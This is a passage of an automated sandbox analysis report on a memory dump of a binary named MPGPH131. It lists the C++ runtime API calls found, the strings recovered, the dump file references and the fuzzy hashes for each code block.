                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,003DDD3B,?,?,?,?,?,00302D8D,003DADBC,?,?,003DADBC), ref: 003F4520
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 48bbdbba7a1362da4fdd152043ef7dda22bb3a28d4d0da1928596669ed205972
                                    • Instruction ID: f2b67d1a62386c44c578e7823dc5d8404d0a8f6049834e268de7125030f2c91f
                                    • Opcode Fuzzy Hash: 48bbdbba7a1362da4fdd152043ef7dda22bb3a28d4d0da1928596669ed205972
                                    • Instruction Fuzzy Hash: C3E09B3110162D57D6233A655C0177B3A8DDF833B1F160121EF4C9A1D1DB50DE0041E5
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0036AB43
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0036AB65
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0036AB85
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0036ABAF
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0036AC1D
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0036AC69
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0036AC83
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0036AD18
                                    • std::_Facet_Register.LIBCPMT ref: 0036AD25
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                    • String ID: bad locale name
                                    • API String ID: 3375549084-1405518554
                                    • Opcode ID: 12b3f523608795b329e3739ccb8fa136d4f59c13fc9856968535082e6fd5af66
                                    • Instruction ID: 8ed83c4bf32e4a088e00ef6afd7357ab54a73a4cc0887222c61e80e59981a903
                                    • Opcode Fuzzy Hash: 12b3f523608795b329e3739ccb8fa136d4f59c13fc9856968535082e6fd5af66
                                    • Instruction Fuzzy Hash: A4616DB1D00654EBDF12DFA4E845B9EBBB4AF05350F158069E805BB385EB34E905CB92
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 003037E9
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00303835
                                    • __Getctype.LIBCPMT ref: 0030384E
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0030386A
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 003038FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                    • String ID: 0:0$bad locale name
                                    • API String ID: 1840309910-4031232150
                                    • Opcode ID: 3ed93b0c7dadf349c162b28d7d278cae72c48285407013bdaee82e33c4bca680
                                    • Instruction ID: 01eb59dafb34fb1ff82779f4316e4150010fd20131b441804df82b701eb642db
                                    • Opcode Fuzzy Hash: 3ed93b0c7dadf349c162b28d7d278cae72c48285407013bdaee82e33c4bca680
                                    • Instruction Fuzzy Hash: F35170B2D01358DBDB11DFA5D84579EFBB8AF14310F14816AE804AB381E775EA08CB92
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 003E0507
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 003E050F
                                    • _ValidateLocalCookies.LIBCMT ref: 003E0598
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 003E05C3
                                    • _ValidateLocalCookies.LIBCMT ref: 003E0618
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 5910cc291f1e387528c1d5666bc3310f1321a06470a928661a459e973e038450
                                    • Instruction ID: 10bd7e8b6b971bce6a7c6884c50d8b9da0b04311c2ac9e009dd9132f32610af8
                                    • Opcode Fuzzy Hash: 5910cc291f1e387528c1d5666bc3310f1321a06470a928661a459e973e038450
                                    • Instruction Fuzzy Hash: 4041F930A042689FCF15DF6AC880A9E7BB4EF45324F148265E814AB3D2D775EA45CF90
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00369263
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00369286
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 003692A6
                                    • std::_Facet_Register.LIBCPMT ref: 0036931B
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00369333
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0036934B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: c657c4c8d75a3c9c12d4d6fdfd8ec5bb1c2df41150b0f73586544476ee4e7b88
                                    • Instruction ID: ce1bbed4086bdb84c1689671a2ab429c6f1faae71d7c491f2153452dd4c730c1
                                    • Opcode Fuzzy Hash: c657c4c8d75a3c9c12d4d6fdfd8ec5bb1c2df41150b0f73586544476ee4e7b88
                                    • Instruction Fuzzy Hash: 06419F72D00219EFCB12DF54E841BAABBB8FB45720F15866AE805AB395D730AD05CBD1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 003060F2
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0030617F
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00306248
                                    Strings
                                    • recursive_directory_iterator::operator++, xrefs: 003061CC
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy$___std_exception_copy
                                    • String ID: recursive_directory_iterator::operator++
                                    • API String ID: 1206660477-953255998
                                    • Opcode ID: ec9d104150e99aa0e5696c67647cf6c673e6443fde7a55fdaf8a3d6edba02f18
                                    • Instruction ID: df072d40c7f1576c86225e5aaa5301835358dfd088cb5909c9d26423467974f5
                                    • Opcode Fuzzy Hash: ec9d104150e99aa0e5696c67647cf6c673e6443fde7a55fdaf8a3d6edba02f18
                                    • Instruction Fuzzy Hash: 1EE133B19106049FDB2ADF68D855BAEB7F9FF44300F10862EE44297781E774AA44CBA0
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 003086DE
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 003086ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: at line $, column
                                    • API String ID: 4194217158-191570568
                                    • Opcode ID: ddc185257668d7934acd1dd77c44026b70c6047ff250515d0f18260c1f723bbe
                                    • Instruction ID: b97806acc45bb8f9c38d3217fb3f8b91183af05f3695769a54b13205c33c74af
                                    • Opcode Fuzzy Hash: ddc185257668d7934acd1dd77c44026b70c6047ff250515d0f18260c1f723bbe
                                    • Instruction Fuzzy Hash: 1B618871E102089FDB0ACF68DC95B9EBBB5FF45310F148619E451AB7C2EB74AA80C794
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00374109
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00374122
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: value
                                    • API String ID: 4194217158-494360628
                                    • Opcode ID: 045a8daa0984c5d62df53d4704e5423a5cb384533651d61441a51bd2b9bdbec5
                                    • Instruction ID: c0db098467623bca59eca7c8ee1362f6bae71f043de259ca8ba3a90901e0d558
                                    • Opcode Fuzzy Hash: 045a8daa0984c5d62df53d4704e5423a5cb384533651d61441a51bd2b9bdbec5
                                    • Instruction Fuzzy Hash: 8151D3B1C00258DFDF25DFA4DC85BDEBBB5AF05304F148259E449AB382D7786A88CB61
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00303C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2659868963-1866435925
                                    • Opcode ID: c9d6b1ff241e5fd832478be8655ed88bbb31281d949e4ef5c290a9bce0338137
                                    • Instruction ID: 30097b6c47e032f552a6757f4ed9b6bbe32c32376421c3ee7c513e6880c1552d
                                    • Opcode Fuzzy Hash: c9d6b1ff241e5fd832478be8655ed88bbb31281d949e4ef5c290a9bce0338137
                                    • Instruction Fuzzy Hash: 1C11D2B2900708ABC711DF58E801B96B7DCAF05310F14C62BF9589B681F774EA54CB95
                                    Strings
                                    • unordered_map/set too long, xrefs: 00372BD3
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: unordered_map/set too long
                                    • API String ID: 0-306623848
                                    • Opcode ID: 1225f2861d56ee1c0f9ddf293a9480c2585ea23aa4553cfe4ff6ddb6643cac3b
                                    • Instruction ID: 459f5dc0926a4299ce4782244a28dadec5d6aa43b27313f4ef72616c065bfb1b
                                    • Opcode Fuzzy Hash: 1225f2861d56ee1c0f9ddf293a9480c2585ea23aa4553cfe4ff6ddb6643cac3b
                                    • Instruction Fuzzy Hash: ADE1E371A002059FCB29DF28C891A6EB7A5FF49310F15C36AE819EB391E734ED51CB90
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 0030844D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: parse error$ror
                                    • API String ID: 2659868963-4201802366
                                    • Opcode ID: 069a050bcc951d00ed4a1761ffc5c10738d8aa00f15df624154de0dfed608241
                                    • Instruction ID: 712217994404f9eea094b8e87e7a578fba5438939b80879ef9de603abb5c1792
                                    • Opcode Fuzzy Hash: 069a050bcc951d00ed4a1761ffc5c10738d8aa00f15df624154de0dfed608241
                                    • Instruction Fuzzy Hash: 9FC11331D10659CFEB0ACF68CC95BADBB71BF45304F148259E044AB6D2DB74AA85CB90
                                    APIs
